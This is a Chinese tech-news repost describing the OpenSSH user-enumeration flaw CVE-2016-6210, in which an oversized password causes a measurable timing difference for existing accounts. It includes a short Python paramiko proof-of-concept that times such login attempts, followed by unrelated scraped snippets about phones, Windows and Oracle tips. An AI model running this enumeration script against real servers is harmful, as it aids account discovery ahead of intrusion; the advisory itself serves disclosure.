OpenSSH 曝枚举系统用户(CVE-2016-6210)漏洞

该漏洞在opensshd-7.2p2 中被发现,但是安全人员指出,该漏洞应该在更早的版本中已经存在。

漏洞描述如下:

当我们使用ssh客户端去连接服务端的时候,如果向服务端发送一个大于10KB的密码,由于OpenSSH服务端会对user:password的组合,使用加密算法SHA256/SHA512进行加密。

如果我们传输的是一个不存在的用户名,那么就不会进入sha256(user,password)加密流程,如果用户名存在,服务器将会针对这个10KB大的密码进行SHA256的加密,这里就会产生时间差。

Sample code:
----------------
import paramiko
import time
user=raw_input("user: ")
p='A'*25000
ssh = paramiko.SSHClient()
starttime=time.clock()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
        ssh.connect('127.0.0.1', username=user,
        password=p)
except:
        endtime=time.clock()
total=endtime-starttime
print(total)

(Valid users will result in higher total time).

关于该漏洞更多详情,可以在这里查看:

文章转载自 开源中国社区[http://www.oschina.net]

时间: 2024-11-05 20:35:15

OpenSSH 曝枚举系统用户(CVE-2016-6210)漏洞的相关文章

央视曝苹果收集用户信息 隐私安全引关注

1.iPhone6真机渲染图曝光:5英寸4K屏幕 这款ihone 6搭载64位苹果A7处理器与M7协同处理器,运行最新的iOS 8系统,并采用了无边框或是三面屏幕的设计,从图片上可以看出,设备的侧边缘也是一个迷你的显示器,这部分将会显示触摸按键和通知. 2.任正非:若爆发金融危机 华为现金可吃3个月 如果说改革速度没有快过危机,当危机爆发的时候,社会这么大的波动,华为怎么办?财务曾算过账,华为公司的现金够吃三个月,那第91天时,华为公司如何来渡过危机呢? 3.央视曝苹果收集用户信息 隐私安全引关

XP系统用户显示器闪屏怎么解决

  XP系统用户显示器闪屏怎么解决          1.右键点击桌面,选择属性 2.然后在显示属性中切换到"设置"选项卡,并点击[高级]按钮 3.然后在弹出的设置页中再切换到"监视器"选项卡,然后在屏幕刷新率中设置显示器的刷新率,一般来说如果CRT显示器分辨率设置为1024X768的话那么设置为80或85是是最高了,当然你如果不知道设置多少为准可以一级一级住上调,如果遇上显示器黑屏,过15秒会自动跳回原来的刷新率,一般80-85CRT显示器是都可以承受的.

Win8.1系统用户账户控制窗口的选项是灰色怎么办

  有时候开机win8.1系统用户就会弹出用户账户控制的窗口,提示"你要允许以下程序对此计算机进行更改"若要继续,请键入管理员密码,然后点击"是".但是发现"是"选项是灰色的,根本没办法点击,这可怎么办呢?针对此问题,小编研究整理出Win8.1系统用户账户控制窗口的选项是灰色的原因和解决方法,大家可参考解决. 原因分析: 上面的提示内容中的程序名称,也可能会是系统配置实用程序,这种情况应该是当前用户是标准用户,安装系统时,没有选择"设置

windows 7系统用户有密码怎么样才能自动登录

用户如果没密码会自动登录,相信很多人都知道.但是用户有密码怎么样才能让它自动登录呢?小编以前也不知道以为不能实现,今天无聊到处搜索下,看看win7有没有这个功能.最后真的让小编找到了.这边跟大家说下实现方法. 1 进入注册表编辑器 通常用的方法是在运行里面输入"regedit".或者直接搜索regedit,搜索到的文件双击下也可以进. 2 到注册表编辑器里面定位到:HKEY_LOCAL_MACHINESOFtwareMicrosoftWindows NtCurrentVersionWi

将Win7系统用户配置文件换到其他盘

  用户配置文件大部分的系统都是默认存放在系统盘的,好处好像没感觉到这样的好处.坏处到时茫茫多,这边我们说下怎么样把配置文件移到其他盘把! 1.这边只分享下在装系统的时候进行更改,因为装好系统了,小编更改好多次都失败,即使成功了.下次换系统还是发现是假的成功,用户配置又没了. 2.用户配置文件放在系统盘的坏处 一重装系统,所以数据都没了.系统用越多,用户配置文件会越来越多,这样C盘可用空间也会越来越少. 3.在装机要求输入用户账号和密码的时候,按下Shift+F10,然后在弹出的DOS窗口依次输

为什么我的系统用户账户出现红叉

    系统用户账户出现红叉问题非常少见,大部分出现的原因是中毒或者中木马,然后注册表被破坏了,或者有的时候你在删除东西的时候,不小心把注册表改了.正常情况这个问题对你使用电脑没什么影响了,除了无法删除用户等跟用户相关的功能基本上都没办法使用,并不影响你正常是用的电脑. 1 系统用户账户出现红叉的原因 如果你自己修改过注册表的话,那么可能是你不小心删除了一些东西,或者你用的垃圾清理器比较不正规把注册表文件也个删了.当然最大的可能是中毒或者中木马了,也有可能是你杀毒杀木马随便把注册表文件也给杀了.

xp系统用户取消注销输入用户名和密码的方法

  现在很多的用户都为了避免麻烦,都将电脑中的账号输入设置改掉了,就连开机前的登入设置都取消掉了,但是最近有用户反映说虽然开机时无需输入用户名,但注销后重新开机却需要输入密码和账号,真是麻烦的很!我们点击注销的目的就是省得麻烦,因为相比重新启动需要等待一段时间,而注销可以最大限度的帮我们节约时间,所以是个很划算的方式.现在注销后重新开机反而多了一个步骤,需要输入用户名和密码,下面小编就教大家一个方法可以把这个步奏取消掉的,一起来看看吧! xp系统用户取消注销输入用户名和密码的方法: 1.首先,咱

oracle 11g-sqlplus连接数据库,系统用户可以连接,自己新建的用户无法连接,报错12514.

问题描述 sqlplus连接数据库,系统用户可以连接,自己新建的用户无法连接,报错12514. 我用sqlplus连接数据库(oracle11g),用system,sys用户都可以连接,但是新建的用户无法连接,错误ora-12514无法解析指定的连接标识符.确定不是用户权限问题,用pl/sql可以连接上.尝试了网上各种方法,无法解决,求大神帮忙,已经很多次遇到这种问题了. 解决方案 可能是你新建用户的时候,没有给新用户分配权限

linux 登录一些一些系统用户时 显示bash-4.2$

问题描述 linux 登录一些一些系统用户时 显示bash-4.2$ 经过网上资料查询 缺少用户环境配置文件 复制/etc/skel下的相关文件后 ,我进行了如下操作,确实可以完成 [root@localhost 桌面]# su tcpdump bash-4.2$ exit exit [root@localhost 桌面]# source /home/tcpdump/.bashrc [root@localhost 桌面]# su tcpdump bash-4.2$ source /home/tc